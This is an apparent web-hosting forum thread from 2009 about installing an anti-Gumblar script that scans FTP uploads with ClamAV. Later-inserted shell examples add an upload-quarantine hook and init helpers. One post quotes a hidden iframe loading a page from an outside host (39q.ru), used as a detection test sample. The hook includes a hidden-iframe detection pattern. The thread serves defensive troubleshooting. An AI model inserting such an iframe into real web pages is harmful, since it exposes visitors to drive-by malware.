The Community Forums
SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

Discussion in 'Security' started by hidonet, Aug 7, 2009.

  1. Vinayak (Well-Known Member, Root Administrator)

    But as of now, where is the file ftp_clamscan.sh? From where can we download this file?
     
  2. hidonet (Well-Known Member)

  3. Vinayak (Well-Known Member, Root Administrator)

  4. smksa (Member)

    Hi,

    I notice that the script will scan the overwritten file and move it to quarantine.

    E.g.: public_html/index.php. If the attack overwrites index.php, the existing index.php will be removed and moved to the quarantine folder.

    Is there any way that we can avoid the overwrite and avoid removal of the existing index.php file?

    Probably by scanning during the upload, before the overwrite happens? :confused:
     
  5. hidonet (Well-Known Member)

    I want to scan before the overwrite, but this is not possible at this time.
    I've contacted the author of PureFTPd and asked him. He has not replied to me yet.
     
  6. hidonet (Well-Known Member)

  7. isputra (Well-Known Member)

    It's not working. After installing this script as in the manual and restarting FTP, I tried to upload a file with this code in it:

    PHP:
    <iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
    The file, which I called if-rame.html, still gets through the FTP process and resides on the server without rejection from this script.

    So... how do I get this script working?
     
  8. hidonet (Well-Known Member)

    I'm going to update my script.

    These changes will be applied to the script very soon:

    1 ) sh files need not be
    2 ) the user name will be extracted from the file path. This was a bug: Pure FTP is not returning the username and other arguments.
    3 ) I will try to extract a clean copy of the infected file from backup.
     
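    The thread's own ftp_clamscan.sh is not reproduced here. The following is an added example, not hidonet's script, of a hook of the same shape: pure-uploadscript runs it with the path of a finished upload as its first argument, so, as hidonet says in reply to smksa, it can only act after the original file has already been replaced. It runs clamscan when ClamAV is installed, checks for the hidden-iframe pattern isputra tested with, derives the account from the /home/<account>/ path as hidonet's update describes, and moves a hit into a per-account quarantine directory. The quarantine and log locations are assumptions.

```shell
#!/bin/sh
# Added example of a pure-uploadscript hook (hypothetical; not hidonet's ftp_clamscan.sh).
# pure-uploadscript invokes this with the full path of the completed upload as $1.
# Assumed locations (not from the thread):
QUARANTINE_ROOT="${QUARANTINE_ROOT:-/var/quarantine/ftp}"
LOGFILE="${LOGFILE:-/var/log/ftp_upload_scan.log}"

# Derive the cPanel account from a path of the form /home/<account>/...; "unknown" otherwise.
account_from_path() {
    case "$1" in
        /home/*/*) printf '%s\n' "$1" | cut -d/ -f3 ;;
        *)         printf 'unknown\n' ;;
    esac
}

# Succeeds when the file holds an iframe styled invisible (visibility:hidden or display:none),
# which is the pattern the thread is about. Newlines are removed first so a tag split across
# lines is still matched.
has_hidden_iframe() {
    tr -d '\n\r' < "$1" | grep -qiE '<iframe[^>]*(visibility:[[:space:]]*hidden|display:[[:space:]]*none)'
}

# Succeeds only when clamscan is installed and reports the file infected (exit status 1).
# A missing ClamAV or a scan error (exit status 2) is not treated as a hit.
clamav_flags() {
    command -v clamscan >/dev/null 2>&1 || return 1
    rc=0
    clamscan --no-summary --quiet "$1" >/dev/null 2>&1 || rc=$?
    [ "$rc" -eq 1 ]
}

# Move the file under QUARANTINE_ROOT/<account>/, keeping its name plus a timestamp suffix.
quarantine() {
    account=$(account_from_path "$1")
    dest="$QUARANTINE_ROOT/$account"
    mkdir -p "$dest"
    chmod 700 "$dest"
    mv -- "$1" "$dest/$(basename "$1").$(date +%s)"
}

# Check one uploaded file. Returns 0 when it is clean and left in place,
# 2 when it was quarantined. Each hit is appended to LOGFILE.
scan_upload() {
    f="$1"
    [ -f "$f" ] || return 0
    reason=""
    if clamav_flags "$f"; then
        reason="clamav"
    elif has_hidden_iframe "$f"; then
        reason="hidden-iframe"
    fi
    if [ -n "$reason" ]; then
        printf '%s QUARANTINE account=%s reason=%s file=%s\n' \
            "$(date '+%F %T')" "$(account_from_path "$f")" "$reason" "$f" >> "$LOGFILE"
        quarantine "$f"
        return 2
    fi
    return 0
}

# When invoked by pure-uploadscript, $1 is the uploaded file; with no argument nothing runs,
# so the functions above can be exercised on their own.
if [ -n "${1:-}" ]; then
    scan_upload "$1"
fi
```

    Installed in place of the thread's hook it would be started the same way, `/usr/sbin/pure-uploadscript -B -r /path/to/hook.sh`, and must be executable, the point Vinayak raises later in the thread. Note that the hook's exit status is not used by pure-uploadscript; the only effect it has is what it does to the file and the log.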
  9. smksa (Member)

    Has the pureftpd author responded to your question regarding scanning while uploading?

    I think this would be a better solution.
     
  10. hidonet (Well-Known Member)

    No response from the author :(
     
  11. webicom (Well-Known Member)

    Hello,

    I have also installed your script step by step from your site, but it is not working. I have restarted pure-ftpd and clam and it is still not working. The only thing I do not quite get, and maybe the mistake that keeps the script from working is here, is this part at step 2, "Patch /etc/init.d/pure-ftpd": should I do something there? In step 2 I have only "Edit /etc/init.d/pure-ftpd" as you instruct, but I do not know what (if anything) I should do at "Edit /etc/init.d/pure-ftpd".

    I would really appreciate your help, since by its description your script looks fantastic and would be a really good defense against iframe and some other hacks too.

    Best regards, Erik
     
  12. hidonet (Well-Known Member)

    Possible problems:

    1 ) restart pure-ftpd with /etc/init.d/pure-ftpd restart; the script does not work with a WHM restart

    2 ) you can use nano or vi for editing files, e.g.: nano /etc/init.d/pure-ftpd

    A new update will be coming soon...
     
  13. webicom (Well-Known Member)

    Thanks, but I did all that and it is not working. If I use the command ps aux | grep clam I do see that /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh is running, but it does not scan uploaded files. If I kill that process and restart pure-ftpd, the process starts again but just won't scan files.
     
  14. ThE EnD (Member)

    I cannot get it working

    Hello,
    first let me thank you so much for that great work
    and hard one

    but I am sorry to tell you I can't make it work on my server

    I followed all the steps
    Anti-Gumblar Protection Documentation
    all of it

    but what do I do after that?
    should I make anything,
    open any files or anything to make the script start?

    or what?

    and another thing:
    when I type

    /etc/init.d/pure-ftpd restart


    I get that result

    can you solve that please, and thank you

    and should I replace that
    GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

    with the correct key I get from WHM?

    in ThE EnD I am sorry for my English
    waiting for your answer
     
  15. Vinayak (Well-Known Member, Root Administrator)

    @ ThE EnD
    @ webicom

    Have you guys made the script executable? Check file permissions.

    Also note that there are two files: ftp_clamscan.sh, which passes variables to ftp_clamscan.php, so both should have correct permissions.

    @ webicom
    Yes, you should.
     
  16. ThE EnD (Member)

    I have given the two files chmod 755; is that ok?
    and then replaced the access key with the right one from WHM for root

    and then tried to make

    so what's the error here? and how do I solve that problem?

    and how do I start the script working?

    please explain
     
  17. Vinayak (Well-Known Member, Root Administrator)

    Use

    chmod +x ftp_clamscan.sh
    chmod +x ftp_clamscan.php

    at the command line. Also see if an error_log file is generated in the same folder. If error_log is there, check it out and see what message is in there.
     
  18. webicom (Well-Known Member)

    Thank you vinsar, I forgot to chmod the php file and now that I did it is working. But I still have a strange problem: on one server the script always finds the iframe script and blocks the attacker but does not change the password for the infected user. On the other server the script does not always find the iframe script but does block the IP and change the password. The first server is CentOS 4.7, the other one is 5.2; both are the same WHM/cPanel version. Usually on the server where the script does not always find the iframe script, after it finds an infected file I have to kill the pid of the ftp_clamscan.sh script and restart pure-ftpd, and then it finds the script again, but after the first find it does not find any more. Any idea why that is?
     
    #38 webicom, Aug 25, 2009
    Last edited: Aug 25, 2009
  19. ThE EnD (Member)

    I have made the changes as you requested for the two files

    and these files are in the root directory

    or where should I put them?
    and also

    I am still finding the same error when restarting ftp

    /etc/init.d/pure-ftpd restart
    Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
    kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

    Stopping pure-authd:
    Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
    [ OK ]
    Starting pure-authd:

    please tell me what that is,
    as it's from the two lines you asked to add in the ftp conf. files
    in your explanation

    and you did not answer me:

    after all that, how do I know if the script is running or not?

    and thanks
     
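    The "cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory" and "kill: usage" lines in ThE EnD's output are what a stop step produces when it reads the pid file and hands the result to kill: the file is absent, so kill receives no pid at all. As an added example, not hidonet's patch to /etc/init.d/pure-ftpd, here are start, stop and status helpers of the kind such a patch needs, using the pid-file path from that output and the hook path from webicom's ps listing. They assume pure-uploadscript accepts -p to write its pid file (its manual page documents the option; confirm on your version).

```shell
#!/bin/sh
# Added example of init-script helpers for pure-uploadscript (hypothetical; not hidonet's patch).
# Assumption: pure-uploadscript accepts -p <pidfile> to record the pid of the daemonized (-B) process.
UPLOADSCRIPT_BIN="${UPLOADSCRIPT_BIN:-/usr/sbin/pure-uploadscript}"
UPLOADSCRIPT_PID="${UPLOADSCRIPT_PID:-/var/run/pure-ftpd/pure-uploadscript.pid}"
UPLOADSCRIPT_HOOK="${UPLOADSCRIPT_HOOK:-/root/ftp_clamscan.sh}"

# Print the recorded pid only if the pid file exists, holds a number, and that process is alive.
# Fails (prints nothing) for a missing or stale pid file.
uploadscript_pid() {
    [ -r "$UPLOADSCRIPT_PID" ] || return 1
    pid=$(tr -cd '0-9' < "$UPLOADSCRIPT_PID")
    [ -n "$pid" ] || return 1
    kill -0 "$pid" 2>/dev/null || return 1
    printf '%s\n' "$pid"
}

# Stop: signal the live process if there is one, then clear the pid file.
# Succeeds when there is nothing to stop, instead of calling kill with an empty argument.
stop_uploadscript() {
    if pid=$(uploadscript_pid); then
        kill "$pid" || return 1
    fi
    rm -f "$UPLOADSCRIPT_PID"
    return 0
}

# Start: refuse when the hook is missing or not executable (the permission problem
# Vinayak points out), and do nothing when a live instance is already recorded.
start_uploadscript() {
    if [ ! -x "$UPLOADSCRIPT_HOOK" ]; then
        echo "hook $UPLOADSCRIPT_HOOK is missing or not executable" >&2
        return 1
    fi
    if uploadscript_pid >/dev/null; then
        return 0
    fi
    mkdir -p "$(dirname "$UPLOADSCRIPT_PID")"
    "$UPLOADSCRIPT_BIN" -B -p "$UPLOADSCRIPT_PID" -r "$UPLOADSCRIPT_HOOK"
}

# Status: answers the "how do I know if the script is running" question.
# Returns 0 when running, 3 (the LSB "not running" status) otherwise.
status_uploadscript() {
    if pid=$(uploadscript_pid); then
        echo "pure-uploadscript running (pid $pid)"
        return 0
    fi
    echo "pure-uploadscript not running"
    return 3
}
```

    In the init script the stop helper would be called before pure-ftpd itself is stopped and the start helper after it is started, so that `/etc/init.d/pure-ftpd restart` no longer errors on a first run when no pid file exists yet; `status_uploadscript` gives the same answer as the `ps aux | grep clam` check webicom suggests.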
  20. webicom (Well-Known Member)

    Run the command ps aux | grep clam through SSH and reply here with what you get. The best way to test if the script is working is to upload index.html or whatever file with an iframe in it; if you have set everything right you should be disconnected from the server and get an email. If you are going to test this way, make sure you still have another location with a different IP from where you can connect again.
     